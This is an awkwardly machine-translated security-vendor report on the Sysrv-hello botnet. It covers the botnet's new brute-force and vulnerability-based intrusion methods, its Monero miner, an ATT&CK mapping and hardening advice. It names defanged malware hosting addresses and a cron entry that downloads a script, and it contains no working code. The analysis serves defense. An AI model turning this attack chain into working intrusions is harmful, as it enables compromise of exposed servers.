In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/03 Report--
This article is mainly about "what are the new attack capabilities of the latest version of the Sysrv-hello botnet?" interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn what are the new attack capabilities of the latest version of Sysrv-hello botnet.
I. Overview
Tencent Security threat Intelligence Center has detected that the Sysrv-hello botnet has been very active recently, which has the comprehensive attack capabilities of Trojans, backdoors, worms and other malware.
Sysrv-hello botnet was first disclosed in December 2020. Tencent Security discovered that the group used Weblogic remote code execution vulnerability (CVE-2020-14882) to spread attacks in January this year, and this month the group upgraded its attack methods again: five new attack capabilities have been added, and the number of lost hosts has been observed to be on the rise. Its intrusion method covers the Web services commonly used by most government and enterprise units, causing serious harm. Tencent security experts remind security operation and maintenance personnel of relevant units to be highly vigilant.
Sysrv-hello botnet attack targets cover both Linux and Windows operating systems, and eventually use fallen hosts to mine mines, which will consume a lot of host CPU resources and seriously affect the normal service operation of hosts. The botnet will also use fallen hosts to continue to scan and attack other targets. The full range of Tencent Security products have supported detection and defense against attack propagation activities in all aspects of the Sysrv-hello botnet.
Investigation and reinforcement
Tencent security experts recommend that security operators check the following items to determine whether the system has been damaged.
File:
/ tmp/sysrv*
/ tmp/ random directory / kthreaddi
Process:
Sysrv*
Kthreaddi
Scheduled tasks:
Risk crontab entry for drop-down execution (hxxp://xx.xx.x.x/ldr.sh)
It is recommended that the following items be reinforced to eliminate risks:
Jupyter, WordPress, Jenkins, Redis and other service components configure strong passwords
The redis port is not open to the public if it is not necessary. When it must be open, the appropriate access control policy should be configured.
Upgrade Apache Solr components to the latest version to eliminate the impact of vulnerabilities.
2. Sample analysis
After analyzing the samples, it is found that the code structure of the current version of the Sysrv-hello botnet Trojan changes greatly compared with previous versions, and the sample behavior layer not only adds port anti-debugging and infrastructure updates used. Five kinds of intrusion methods have also been added, except for Mysql blasting, Tomcat blasting, Weblogic vulnerability exploitation and Nexus weak password command execution vulnerability exploitation. Intrusion attacks for the following 5 components have been added.
1.Jupyter weak password blasting intrusion
2.WordPress weak password blasting intrusion
3.Jenkins weak password blasting intrusion
4.Redis is not authorized to write scheduled task intrusion
5.Apache Solr command execution vulnerability exploit (CVE_2019_0193).
The previous version of the hello_src_exp combination attack is retained:
After the successful intrusion, the shell script is implanted to execute malicious commands, and the script further pulls the sysrv worm diffusion module. The analysis process captures two malicious file hosting addresses, hxxp://finalshell.nl,hxxp://45.145.185.85, and the corresponding sysrv worm module is named sysrv002,sysrv003 respectively, which shows that the worm updates frequently.
After the analysis version of sysrv worm starts, the port is randomly scanned, and the ip is randomly generated. One of the 9 prepared target ports is randomly selected for scanning and detection, and the target is open to service and the attack mode is confirmed. The unit of single scan cycle is 5 minutes.
The scan port information is as follows
After patch the random target scanning code of sysrv worm, it is more convenient to observe its single attack flow.
The new version of the virus, compared with the previous version, has added 5 kinds of component attack methods, mainly including the following parts:
Jupyter weak password blasting intrusion
Jupyter Notebook is an interactive notebook that supports running more than 40 programming languages. It is essentially a Web application that facilitates the creation and sharing of literary program documents, supporting real-time code, mathematical equations, and visualization. An unauthorized access vulnerability occurs when an administrator does not configure a password for Jupyter Notebook, or when a weak password is configured. An attacker has the opportunity to log in to his administrative interface and then create a console to execute arbitrary code.
Jupyter Notebook login management interface
Click terminal to create console to execute arbitrary code
The sysrv infection process detects the Jupyter login page of the target.
Query its login interface and try to log in to the Jupyter management backend with a weak password package.
Some of the weak passwords used in the attack process
After a successful login, call the management panel terminals API to execute commands to invade the server to execute malicious scripts.
The following picture shows that after the Jupyter component was successfully invaded, the sysrv003 worm module was implanted.
Apache Solr Command execution vulnerability intrusion (CVE_2019_0193)
Apache Solr is an open source search server. Solr is developed in Java language and is mainly based on HTTP and Apache Lucene. On August 1, 2019, Apache Solr officially issued a CVE-2019-0193 vulnerability warning with a vulnerability hazard rating of serious. The virus uses this way to invade the server and implant malicious scripts to execute malicious code.
WordPress weak password blasting intrusion
WordPress is an open source software system that quickly builds excellent websites, blogs or applications. When the password of the WordPress administrator is set too simply, attackers have the opportunity to violently crack and log in to the system and further invade the host. The attacker violently cracked the xmlrpc.php interface, further bypassed the WordPress security restrictions, and finally further implanted malicious code by modifying the theme or uploading plug-ins.
Jenkins weak password blasting intrusion
In the Jenkins panel, users can choose to execute script interface to operate some system commands, and attackers can gain server privileges by entering the script execution interface through unauthorized access vulnerabilities or brute force cracking of user passwords.
Some of the weak passwords used during the attack
Redis is not authorized to write scheduled task intrusion
By default, Redis binds the service to 0.0.0.0 Redis 6379, thus exposing the service to the public network environment. If security authentication is not enabled, it can cause any user to access the Redis server without authorization and perform read and write operations. The virus further invades by exploiting write scheduling tasks through vulnerabilities.
Kthreaddi mining
The final load of the virus delivery is still a mining Trojan, and the sysrv module will protect the mining process in its Guard daemon process. When the kthreaddi process does not exist, it will release the mining machine to a random directory under the tmp directory, run it, and then delete the local mining machine files.
Release the mining machine to a random folder under the\ tmp directory, name it kthreaddi, and delete it
The mining machine will take up a high amount of machine resources, and the mining machine will still be of the XMR type and will be excavated with Monroe coins.
Third, aggressive behavior from the perspective of threat
ATT&CK stage
Behavior
Reconnaissance
By randomly generating IP and scanning IP ports, confirm the existence of Web services: Jupyter, WordPress, Jenkins, etc.
Development of resources
Register the C2 server and plant worm modules into the hacked server to further spread
Initial access
Implant malicious Payload to execute malicious commands and invade the system by using Web services that are open to the outside world.
Execution
First implant malicious scripts to execute malicious commands, then download and implant ELF worms and mining modules
Persistence
Using scheduled tasks to achieve persistent residence
Defense against circumvention
The mining process is called kthreadaddi, and the mining process name is highly similar to the system process name to achieve confusion.
find
Confirm subsequent attacks by scanning target web service information
Influence
Worm sysrv module scanning for a long time, Monroe coin mining machine uninterrupted work, will lead to the system CPU load is too large, a large consumption of host CPU resources, seriously affect the normal service operation of the host, resulting in the risk of system collapse.
At this point, I believe you have a deeper understanding of "what are the new attack capabilities of the latest version of the Sysrv-hello botnet?" you might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 291
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.